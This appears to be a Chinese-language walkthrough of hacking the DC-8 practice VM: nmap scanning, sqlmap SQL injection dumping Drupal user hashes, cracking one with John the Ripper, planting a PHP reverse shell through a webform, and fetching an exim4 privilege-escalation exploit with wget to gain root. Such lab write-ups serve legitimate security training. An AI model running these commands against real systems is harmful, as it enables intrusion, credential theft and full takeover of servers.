DC8-靶机

下载地址

 

配置的环境：

kali：192.168.25.131         DC8-靶机 和 kali 在同一C段

 

渗透

nmap扫描网段，发现存活主机

nmap -sP 192.168.25.0/24

 

发现主机 192.168.25.129，判定为DC8-靶机，继续使用nmap获取详细信息

nmap -A -p 1-65535 192.168.25.129

 

开启了ssh，访问靶机ip得知，为Drupal CMS

 

访问站点，发现注入点，存在报错注入~

 

sqlmap启动

sqlmap -u http://192.168.25.129/?nid=1%27 --dbs

 

sqlmap -u http://192.168.25.129/?nid=1%27 -D d7db --tables

 

sqlmap -u http://192.168.25.129/?nid=2  -D d7db -T users --columns

 

sqlmap -u http://192.168.25.129/?nid=2  -D d7db -T users -C "uid,name,pass" --dump

admin   $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

 

得到账号和密码的hash，爆破hash 使用john工具（作者站点账户为john，提示~）

用法： john 密码文件

将john的hash放入密码文件中，开始爆破

 

得到密码  turtle，找后台登录

dirsearch扫描登录目录，扫到/user，登录

 

参考DC-7靶机后台拿shell，依旧是写入PHP文件反弹，

点击上面的Contact，选择Contact Us，后点击Webform -> form settings，选择PHP code，然后填入DC-7靶机用的反弹脚本

 

nc监听,回到Contact us主页面，随意填写基本内容，然后提交

.

 

成功得到一个交互式的shell

python -c "import pty;pty.spawn('/bin/bash')"

 

看看哪些命令是root权限

find / -perm -4000 2>/dev/null

 

发现exim4 查看对应版本信息

 

利用exim4提权，提权需要有写权限，www-data用户在当前目录下无写权限，所以切换到有写权限的/tmp目录下

 

在靶机上下载提权的exp

wget https://www.exploit-db.com/download/46996

 

脚本需要编辑，因为在本地，可以互通，也本地起一个apache服务，将下载脚本放到kali上，靶机在去kali上下载

 

 

 

提权到root！

执行脚本，报错~

 

搜索发现这个报错是由于windows下编辑上传到linux下执行导致的

本地编辑查看文件类型  :set ff?，会出现 dos或unix格式，如果为dos，需要改为unix模式

 

使用 ：set ff=unix 修改文件格式 强制为unix格式，并保存退出

 

重新下载，执行(脚本建议使用高端口，我用的是默认的)

 

 

成功！